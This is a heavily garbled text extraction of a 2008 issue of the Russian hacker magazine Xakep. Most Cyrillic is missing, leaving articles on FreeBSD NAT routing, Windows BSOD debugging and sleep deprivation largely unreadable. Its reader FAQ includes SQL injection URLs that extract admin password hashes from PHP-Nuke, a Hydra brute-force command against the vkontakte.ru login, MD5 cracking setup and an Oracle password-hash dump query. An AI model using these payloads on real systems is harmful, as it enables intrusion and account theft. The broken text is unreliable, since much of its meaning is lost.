.
, , . ,
, :
172.16.0.0/24 to any
172.16.0.0/16 to any
192.168.1.2
100.100.100.102
192.168.1.2 to any

1000
172.168.0.x natd,
8669; 1100 , NAT
172.168.x.x.
, forward

.
,
IPFIREWALL,
IPFIREWALL_
FORWARD , ,
IPDIVERT.
FreeBSD 7.0

IPFIREWALL_NAT
LIBALIAS ( ).

IP- ,

.

(,
) ,
.

( round-robin)
OpenBSD

,

][ #092.
3:
Sendmail ,
,
NAT . ,
:
1. 192.168.1.1 ("route add default
192.168.1.1").
2. , ed0.
3. Sendmail , .
. SMTP -
links
www.
opennet.ru www.
dreamcatcher.ru

,
.
141
>> .PRO
DNS- MX-, rl0
(100.100.100.102).
, ed0? Sendmail :
$ grep CLIENT /etc/mail/my.domain.ru.mc
CLIENT_OPTIONS('Addr=100.100.100.102')dnl
:
# cd /etc/mail
# make
# make install && make restart
, ,
, :
100.100.100.102 to any
, , , to
any 25, .
MTA ,
.
4:
:

NAT-. -. ipfw
.
, Squid
ACL-:
$ grep buh /usr/local/etc/squid/squid.conf
acl lan src 172.16.0.0/255.255.0.0
acl buh src 172.16.1.0/255.255.255.0
tcp_outgoing_address 192.168.1.1 buh
tcp_outgoing_address 100.100.100.102 lan
.
, ,
( , , ..) .
, -
. PPP- (
ADSL PPPoE)
if-up if-down ( ; , , ).
IP- , ping,
. , PPP-
,
. , , . ,
ping. ,
,
, , .
142
Squid- , ,
:
# ipfw add 1500 fwd 192.168.1.1 ip from 192.168.1.2 to
any
100.100.100.102
, , defaultrouter.
5:
, .
,
. , NAT- - .
, , . ipfw skipto prob:
# natd -a 100.100.100.102 -p 8668
# natd -a 192.168.1.1 -p 8669
# ipfw add 0500 check-state
# ipfw add 0900 prob 0.330000 skipto 1100 tcp from
172.16.0.0/16 to any setup keep-state
# ipfw add 1000 divert 8668 ip from 172.16.0.0/16 to any
# ipfw add 1050 skipto 1200 ip from any to any
# ipfw add 1100 divert 8669 ip from 172.16.0.0/16 to any
100.100.100.102 via rl0
# ipfw add 1300 divert 8669 ip from any to 192.168.1.2
via ed0
# ipfw add 1500 fwd 192.168.1.1 ip from 192.168.1.2 to
any
,
NAT, . (keep-state/
check-state) , ,
, .
, TCP-
skipto (
prob), 500
1100. ,
,
, .
nat- FreeBSD 7.0,
, sysctl- net.
inet.ip.fw.one_pass.
, nat-
;
:
# sysctl net.inet.ip.fw.one_pass=0
net.inet.ip.fw.one_pass: 1 -> 0
.

, .
IP- ,
. ( ) NAT.
,
.z
x 05 /113/ 08
>> .pro

BSOD
WINDOWS SErVEr 2003
,
. ,
,
. ,
, Server 2003 Standard Edition.
NT.
,
, .
: ,
..
KeBugCheckEx, BSOD
( ). (, SoftICE) KeBugCheckEx,
.
,
.
NT, , ,
(!) . NT 4.x ( ) call-back (
) KeBugCheckEx, , ,
, .
Server 2008, call-back
( NTFS , , ?!).
144
NT
.
Linux, xBSD ,
.
(kernel panic BSOD).
, NT : ( );
, (
,
); KeBugCheckEx
-. ? ,
, .
BSOD : , rootkit. API-
(
), .
, /rootkit.
, ,
x 05 /113/ 08
>> .PRO
Win2k3 VM Ware
, NT (
,
,
)
IRQL_LESS_OR_EQUAL
,
,
,

info
, ,
/
( BIOS ). (
,
).
, /
rootkit. , rootkit (][ , ), .
, ,
,
,
DriverStudio, , .
( ).
, , (
, ),
,
. , ,
.

.
.
boot.ini. boot.ini,
, , .
MSDN: support.microsoft.
com/kb/833721/ru ( )
Boot.ini options reference
www.ingenieroguzman.com.ar.
. NT , .
gflags.exe,
Support Tools, DDK,
Microsoft.
. Win2k3 128
,
. , (
) Google .

(, , ReactOS ..).
x 05 /113/ 08
BSOD

,
. ,
. :
A I IRQL=PASSIVE_LEVEL,
B II IRQL.
Device 1 I ,
, IRQL I DIRQL
Device 1.
DpcForIsr() .

, (
I).
Device 1 ,
II, I
IRQL.
IRQL II DIRQL
Device 1,
DpcForIsr()
II.
, , IRQL,
, I II.
, DpcForIsr()
,
! ,

.
?
, ,
/ONECPU /NUMPROC=1
boot.ini. , ,

BSOD, ,
.
BSOD IRQL_
LESS_OR_EQUAL,
? , ? NT
Interrupt Request Levels (

BSOD

MSDN,
DDK. ,
, ,
,
,

.

BSOD,
,
.
145
>> .pro
gflags.exe Microsoft Techcenter
DDK
links
Boot.ini
options reference
www.
ingenieroguzman.
com.ar.
dvd

Windows
Server 2003 SP1 DDK.
146
IRQ), 0
31. 0 , 31 .
(PASSIVE LEVEL == 0),
,
. IRQL
ISR
(Interrupt Service Routine ), ,
2, , ,
3.
, ! , , .
, , , BSOD.
? ,
. ,
DisablePagingExecutive (
DWORD) 1 (
: HKLM\SYSTEM\CurrentControlSet\Control\
SessionManager\MemoryManagement).
gflags.exe dps, .
.
(
),
. , DoS ,

, , BSOD
IRQL_LESS_OR_EQUAL.
, Win2k3 SP2 ,
SafeSEH BSOD
, DbgPrint,
.
16h Exploits Review,
][. BSOD
gflags.exe ddp.
, BSOD
- ,
( ?) VGA boot.ini
/BASEVIDEO.
(Physical Address Extensions
PAE). 4 ,
Win2k3 Standard Edition
, Enterprise Edition.
DEP (Data Execution
Prevention), Win2k3 SP1, PAE, , .
,
PAE
, .
/NOPAE boot.ini
.
BSOD
, ,
(
).

VM Ware,

. BSOD
. , VM
Ware
. , .

,
boot.ini. , ,
boot.ini
,
Win2k3 ( , ).z
x 05 /113/ 08
>> units

? : (, ,
) !
, , , . , , ,
?
, ,
, ,
,
.
, , .
, ,
LCD- .
,
, ,
148
,
,
,
, .
,
, , ,
!
, ,
, . , Wikipedia
x 05 /113/ 08
>> units
( )
.
, . (
), ,
.
,
.
. , !
Memento (),

Sleep Sleep deprivation ,

, (
, , ).
, , etc, , ,
,
.

.
(~36 ).
(~12 ),
/ .
.
, . (
) , .
(-, ).

6-9 ( ,
!).
~4
( ).
,
, , , (
x 05 /113/ 08
), , , ,
.
, . ,
.
, , . ,
36 , ,
.
, !
REM-,
,
.

,
. ! .
warning
,
,

.
links

: en.wikipedia.
org, :
Sleep Sleep_
deprivation.

. ( )
? , .
, , ( ). ,
: .
, ( , , growth
hormone). , ,
,
, (
, -
149
>> units
growth-
). ,
. ,
, .

, , ,
.
. , ,
, , ,

, ~24 ( ).

, 6 .
, ,
. ,
(
, ). ,
.
, . , ,
, , , .
,
. ,
, , . Ts. , - ,
,
Ta, , X, (X Ta).
( , ,
), : X
,
/.
, ,
, .
150

; -
.
,
(
).
.
(, ). , ,
, . (
Memento).
,
, , , ,
. , ,
, .
, . ,
, , . ,
, ,
.
, - , ,
, .
( , )
, ,
, .

( ) ( ),
, ( ), .
, , ,
, - !
, hypothalamic-pituitary-adrenal axis (, HPA).
(
) , , , .
, .
!
, ( , ), , .
x 05 /113/ 08
>> units
.
( ) -
, .
( )
, .
,
.
48 ( ),
,
( ),
.
72 ( )
, ,
. ,

. .
, ,
.
, (,
!).
(- ) ,
,
, , ,
. -
(
, ). ,

(, ),
,
. - ,
.

( , , ).
x 05 /113/ 08

.

, ,
. (
), ( )
,
: , ,
,
( 4-6 ).
- ,
, . ,
(, ) , .
( 36 )
(
, ).
, ,
,
. ,
.
,

. ,
,
. , , ,
.
()
,
.
, , , , , ,
. ! , ,
, , , ( , ).

,
. ,
( , ). , ,
. z
info

,

.
, ,

, ,

.

,
.
151
>> units
Corwin
Step
/ faq@real.xakep.ru
/ corwin88@mail.ru /
FAQ U N I T E D
, ! ,
. !
, .
Q: ,
, 100% .
A: , LIMIT. : http://target/script.
php?p=-1 union select 1,2,user,4 from
users/*, limit n:
http://target/script.php?p=-1 union
select 1,2,user,4 from users limit
n,1/*, n 0-9.
Q:
SQL-injection .
PHP(Post)-Nuke.
A: , ,
152
, e-mail
. ( ):
http://localhost/modules.php?op=
modload&name=Messages&file=read
pmsg&start=9999%20union%20select
1,2,3,4,5,6,pn_pass,8+from+nuke_
users where pn_email='admin@
localhost.com'/*
PHP-Nuke pn_uid=2 (pn_uid=1
(Anonymous)):
http://localhost/modules.php?op=
modload&name=Messages&file=read
pmsg&start=9999%20union%20select
1,2,3,4,5,6,pn_pass,8+from+nuke_
users where pn_uid=2/*
Q: , , ,
, .
,
grsec.
A: , 2.6.22.9grsec.
, grsec ,
. ,
.
x 05 /113/ 08
>> units
Q: Java- ?
A: . - (bytecode
verifier) -,

.
Java
,
.
, ,

(public, private, protected).
Q: ,
John
the Ripper, raw ()
MD5. ?
A: JtR
(http://openwall.com/john) ,
raw MD5.
.
, JtR. :
mkdir john
cd john
wget http://www.openwall.com/john/
f/john-1.7.2.tar.bz2
tar -xvf john-1.7.2.tar
cd john-1.7.2
wget ftp://ftp.openwall.com/
pub/projects/john/contrib/john1.7.2all-9.diff.gz
gzip -d john-1.7.2all-9.diff.gz
patch -p1 < john-1.7.2all-9.diff.gz
cd src
make
make clean linux-x86any

:
./john -format=raw-MD5 /home/
corwin/md5_hashes.txt.
Q:
,
,
.
x 05 /113/ 08
A: GET, .
MySQL/
MSSQL, POST-,
, nsTview v3.1.Post (http://nst.void.
ru/?q=releases&download=16).
Q: SQL-
MySQL,
: Illegal mix of collations
(latin1_swedish_ci,IMPLICIT) and (utf8_
general_ci,SYSCONST) for operation UNION
A:
version() convert(version()
using latin1).
Q:
, NASL,
?
A: : NASL (Nessus Attack
Scripting Language Nessus)
Nessus.
NASL- , ,
Perl-, NASL.
Q: VPN-. :
1) , ,
, ?
2) ,
(/ )
-?
3) Double VPN?
4) -,

?
A: 1) - ,
. .
,
, , , _
VPN.
, VPN- , , . ,
.
, , , ,
VPN
.

, , ,
, , .
,
http://ru.wikipedia.
org/wiki/VPN.
2) VPN- VMWare,
( , Ethereal),
VPN-, .
3) IP-. VPN
,
. , IP.
4) , -
. , ,
.
Q: fuzzing,
. ?
A: ,
,

, ,
.
Linux(and Solaris)
sharefuzz,
setuid.
windows- OWASP
JBroFuzz ,
HTTP, SOAP, XML, LDAP . XSS, SQL-injection, , FSE
.
Google Code . , Bunny the Fuzzer (http://code.
google.com/p/bunny-the-fuzzer) , C. Linux,
FreeBSD, OpenBSD, Cygwin.
Q: Red box, Black box
Blue box.
?
A:
,
, -, .
153
>> units
Red box , ,
. ,
:).
Black box ,
. ,
.
.
Blue box 2600 hz ,
.
,

.
Q: Gmail-?
A: Microsoft Outlook, Outlook Express
Thunderbird, Google Email Uploader (https://
mail.google.com/mail/help/email_uploader.
html). , The
Bat! .
, ? :)
Q: -,
?
A: , , ,
.
/
.. odnoklassniki.ru
xss ( ).
, , , ( ).
.
.
Hydra (http://freeworld.thc.org/
thc-hydra),
154
( ,
.) ( /):
hydra -l useremail%40domainzone
-P passlist.txt vkontakte.
ru http-post-form "/login.php:
email=^USER^&pass=^PASS^:Target"
passlist.txt ,
useremail%40domainzone email , . ,
admin%40vkontakte.ru :).

, ., . ..

- , -
.
P.S.
.
Q: MySQL-,
?
A: bin/mysqldump --user={username}
--password={pass} --databases
{dbname} > /home/corwin/dump.sql
, {username} , {pass}, , ,
{dbname} ,
,
.
Q: USB
?
A: : . ,
NT-,
Windows
Server 2003/2008.
DeviceLock (www.devicelock.
com), -

, ,
(
).
,

,
.

. ,
CD-ROM,
Floppy, USB Removable .
Active Directory,
.
: www.petri.
co.il/disable_usb_disks_with_gpo.htm
Q:
( )
. API - (
YouTube),
. Flash ?
A: ! -
, : - ?
Flowplayer
(www.flowplayer.org) ,
.

: FLV, SWF, MP3, MP4, H.264.
FlowPlayer
,
,
, YouTube.
Q: ,
. , - ,
. ?
A: -, Memtest86 x 05 /113/ 08
>> units
(Chris Brady),
. ( )
, , .
Microsoft Windows Memory
Diagnostic.
.
S&M (http://testmem.nm.ru/snm.htm)
.
,
.

( , ),
.
Q: WebDAV ?
A: Web-based Distributed Authoring and Versioning WebDAV Hypertext Transfer Protocol (HTTP),

WWW . ,

FTP SMB. ,
:
;
(, );
( );
() ;
.
, WebDAV
. WebDAV Windows 2000 ( )
:
URL- WebDAV.
. WebDAV ,
,
http://test.webdav.org/. ,
http-, Apache mod_dav. ,

Apache, - -
. z
x 05 /113/ 08
155
1980 .
( 15%
)
. ,

! !

DVD + DVD + IT CD:

- 147
( 25% , )
. 86
ww w.x ake
p.ru
2008
IT-

200 8
04 (112 )
#05
XML

OD
BS

. 70
. 58
. 32
. 94
oth
Blueto

46
.

mail.
@
ru
C#
. 118
65
. 74
. 36

D
DR3

?
.38
#05 |51
|
2008
:
, ,
,

. 57
032-0
52
3060
NVIDI
A 9600GT
ATI/A
MD Ra
ADSL
deon
c + WI-FI

AM
D Hybrid Cr
D ossFire

Inark Side
tel Over
Drive
DVD
5292

.

113

12
1. , ,
www.glc.ru.
2. .
3. :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
;
20
.
,
.
,
. , , .
+DVD 6 1080 .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>Misc
Ceedo 2.2.1.23
DExposE2
EssentialPIM Free 2.5
EssentialPIM Pro 2.5
KeePass 1.11
ljCrab
Nullsoft Install System (NSIS) 2.36
OCR CuneiForm 12
PrinterShare 1.0
SAS.
SpotAuditor 3.7.1
TagScanner 5.0
Time Boss PRO 2.37
Translate.Net 0.1
TranslateIt! 6.5
TUGZip 3.5.0.0
xStarter 1.9.0
>Games
Motorama 1.1
Soldat 1.4.2
>Development
Axure RP Pro 5.0
CodeVeil 1.3
Construct 0.94.3
DeployLX 3.1
FreeBASIC 0.18.5b
Google App Engine SDK 1.0 B
Javascript Obfuscator 3.0.5
NetBeans IDE 6.1
PECompact 2.80 beta 1
phpDesigner 2008 6.0.2
Robocode 1.6
Visual C++ 2008 Feature Pack
Windows Mobile 6 Professional SDK
Adobe
>>WINDOWS
>Dailysoft
7-Zip 4.57
Comodo Firewall Version 3.0
DAEMON Tools Lite 4.12.3
Download Master 5.5.3.1131
FarPowerPack 1.15
FileZilla Client 3.0.9.2
IrfanView 4.10
K-Lite Mega Codec Pack 3.9.0
Miranda IM 0.7.5
mIRC 6.31
Mozilla Firefox 2.0.0.14
Notepad++ 4.9.1
Opera 9.27
PuTTY 0.60
QIP 2005 8050
Skype 3.8.0
Total Commander 7.03
Unlocker 1.8.7
Winamp Media Player 5.53
Xakep CD DataSaver 5.2
>>UNIX
>Desktop
Abiword 2.6.2
Alsaplayer 0.99.80
>System
Auslogics Emergency Recovery
2.1.13
Auslogics Registry Defrag 4.1.9.96
Comandiux 1.7.27.220
MikeOS 1.3.0
Parallels Workstation 2.2
Parted Magic 2.1
Postgres Plus Advanced Server 8.3
PowerStrip 3.78
Process Explorer 11.13
Super Flexible File Synchronizer
4.12a
USB Disk Security V5.0.0.60
VirtualBox 1.6
Windows Vista Service Pack 1
XYplorer 7.10
>Security
EchoMirage 1.2
EffeTech HTTP Sniffer v4.1
net-snmp 5.4.13
Odysseus 2.0.0.84
Telemachus 1.0
>Net
A1 Website Download 1.3.2
Avant Browser 11.6
Deluge 0.5.9.0
digsby
Gogrok 1.0
Google Talk Labs Edition
IM-History Client Suite 1.2.4
ooVoo 1.5.1.97
SecureCRT 6.0.2
Serv-U 7.0.0.4
ShareAlarmPro 2.0.3
Skype for Windows 3.8.0
StrongDC++ 2.12
Xfire 1.91
YoutubeGet 4.4
>Multimedia
Adobe Photoshop Lightroom 2.0 Beta
AIMP 2.50b
Artweaver 0.5.1
Blender for Windows 2.46 RC3
DeskScapes 1.02
doPDF 6.0.259
Easy CD-DA Extractor 11.5.2
Google Earth for Windows 4.3B
Jing
Keyboard Music 2.4
Pixelformer 0.8.1
ProgDVB 5.14.4
STDU Viewer 1.4
StyleBuilder 2.0 Beta
WinWatermark 2.5
>Server
Amavisd-new 2.6.0-rc2
Apache 2.2.8
Asterisk 1.4.19
Bind 9.4.2
Courier-imap 4.3.1
Cups 1.3.7
Dbmail 2.2.9
Dhcp 4.1.0a1
Dovecot 1.0.13
Mysql 5.0.51a
Nut 2.2.1
Openldap 2.3.39
Openssh 5.0p1
>Security
Clamav 0.93
Dansguardian 2.9.9.3
Flawfinder 1.27
Gnupg 2.0.9
Iplog 2.2.3
Rkhunter 1.3.2
Sing 1.1
Sudo 1.6.9p15
Truecrypt 5.1a
>Net
Cgmail 0.5
Claws-mail 3.4.0
Dspam 3.8.0
Empathy 0.22.1
Fetchmail 6.3.8
Hylafax 4.4.4
Linuxdcpp 1.0.1
Opera 9.27
Webmonx 0.3.2
>Games
Allacrost 0.2.1
Bzflag 2.0.10
Lbreakout2 2.6beta-7
Lincity-ng 1.91beta
Warzone2100 2.1beta2
>Devel
Binutils 2.18
Boost 1.35.0
Ccache 2.4
Fucc 0.2
Gcc 4.3.0
Nasm 2.02
Python 2.5.2
Qt 4.3.4
Scons 0.98.1
Seed7 20080406
Blender 2.45
Enlightenment 0.16.8.12
Gmpc 0.15.5.0
Ksquirrel 0.8.0
Mpg123 1.4.2
Openoffice 2.4.0 pro
Qlabels 0.2
>
Radio-T
Hack
In The Box 2008
>Xakep.PRO
Longhorn
PPP

>Visualhack++
Agnitum.com

Oracle

>X-Distrib
Ubuntu 8.04
>System
Alsa-driver 1.0.16
Ati 8.4
BSD Ports
Dosemu 1.4.0
Iat 0.1.3
Linux 2.6.25
Nerolinux 3.5.0.1
Nvidia 169.12
Peazip 2.0
Powertop 1.9
Tea 17.6.0
Tracker 0.6.6
Openvpn 2.1_rc7
Postfix 2.5.1
Postgresql 8.3.1
Samba 3.0.28a
Sendmail 8.14.2
Snort 2.8.1
Sqlite 3.5.8
Squid 3.0STABLE4
Vsftpd 2.0.6
05(113) 2008
.4

. 52

Oracle
. 30
web-
. 62
web-
05 (113) 2008
. 138
. 122
www.xakep.ru
-
FreebSD
. 116
TV

SIM-
! .
.
: +7 (495) 780 88 25
: sales@gamepost.ru
:
(495) 780-8825

Nintendo Wii
PlayStation 2 Slim
9984 .
5200 .
Advance Wars:
Days of Ruin
1248 .
Blacksite: Area 51
(PAL)
2132 .
Final Fantasy Crystal

Call of Duty 4:
Chronicles Ring of Fates Modern Warfare
1508 .
1482 .
Gran Turismo 5
Prologue (PAL)
1300 .
Hitman Trilogy
1560 .
Xbox 360 Elite (120 GB)
17680 .
PlayStation 3 (40Gb)
PSP Slim & Lite
15990 .
7280 .
3-
Burnout Paradise
2080 .
Dark Messiah of Might Condemned 2

and Magic - Elements
2132 .
1950 .
Devil May Cry 4

2470 .
Medal of Honor:
Metal Gear Solid
Resident Evil: The
Fire Emblem:
Essentials Collection Complete Collections Umbrella Chronicles Radiant Dawn
1820 .
1924 .
1820 .
1560 .
God of War:
Chains of
Olympus
1248 .
Viking: Battle for

Asgard
1950 .
Final Fantasy Tactics:

The War of The Lions (PAL)
1560 .
Army of Two
(PAL)
2210 .
http://
WWW2
- web-,

.

Google
picasaweb.google.com
, . DVD- :
. , ? !
, , . , Google? Picasa
Web Albums 1 ,
.
Picasa
.

www.im-history.com

.
Skype, Jabber,
, .
, ,
. , ,
.
im-history, , ,
, !
160
My Cool Button 2.0

www.mycoolbutton.com

2.0: , , .
, , ,
- . ,
.
, , , , - , --, .
Online-

www.extreme.outervision.
com/psucalculator.jsp
,
, . , -
! ,
. . Last.fm, ,
(EMI, Sony BMG,
Universal, Warner), . , :).
x 05 /113/ 08
x 05()08
web-/ 7 web-
113

Xakep 113

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Xakep 113

Загружено:

Авторское право:

Доступные форматы

SIM-

Windows Server 2008:

PPPoE PPTP Linux

$3 Silicon Alley Insider,

Mobile Research Group, iPhone

Sun Tech Days

(Ian Murdock), (Rich Green)

Hack in the Box

2. VSAT , Rogue AP Wi-Fi,

CyberPower Value 800E

CyberPower Value 600E

Ippon Back Verso

Ippon Back Comfo Pro 600

Ippon Back Verso 400

Creative I-Trigue 3000

Camera Mouse 2008 c , ,

Hand Gesture Interface

tar xjf mando-1.6.tar.bz2

) { echo("Cant open passwd.txt"); } else {

$1450 CANVAS Professional

SQL> select username, password from DBA_USERS;

Assessment of the Oracle Password Hashing Algorithm

SQL> create user test01 identified by abc123_

SQL> create user test02 identified by _123abc;

SQL> create user test02 identified by

orabf woorabf core 2 duo 2.4

Oracle Rainbow Tables

AddHandler server-parsed .txt

static CWnd* PASCAL FindWindow(

MathMagic Personal 3.6. ,

Digalo 2000 DigaloRegister

MathMagic Personal 3.6. 30 uses

.NET- , - . , Visual Basic/C# , hiew

, 556 ( , pdf): www.ecma-international.org/publications/

$cl.exe /clr hello-clr.cpp

n2k_crackme_01h.exe IDA Pro , CIL- . - Java-. IDA

IDA Pro .NET

Dotnet IL Editor IL- GUI-

Display auto comments

Microsoft Visual Studio

IDA Pro .NET

IL_0022: brtrue.s IL_0031

: Anti Keylogger Shield

Black Hat 2006

Apple Mac Pro

# echo 'tmpfs_load="YES"' >> /boot/loader.conf

# mount -t tmpfs tmpfs /tmp

# gvirstor label -v mydisk /dev/ad5 /dev/ad6

2005 KAME IPSec,

$ sudo mcedit /etc/ppp/peers/dsl-provider

2.6.14, 2.6.15 PPP MPPE.

PPPoE PPTP Mandriva

$ pon pptp debug dump logfd 2 nodetach

# dd if=/dev/zero of=fs.img bs=1k count=30000

# mke2fs -c /dev/loop0 30000

Alcohol UltraISO Linux!

function InjectExe(Process: dword;

SendData('', 10, addr(string(buf)), len);

procedure DLLEntryPoint(dwReason: DWord);

.NET C#, F#, Visual Basic , , , . Microsoft Visual C++

$cl.exe /CLR hello.cpp

Lets go shake, shake!

Vista SP1, . , , , Vista ( ,

acl adsense url_regex i pagead2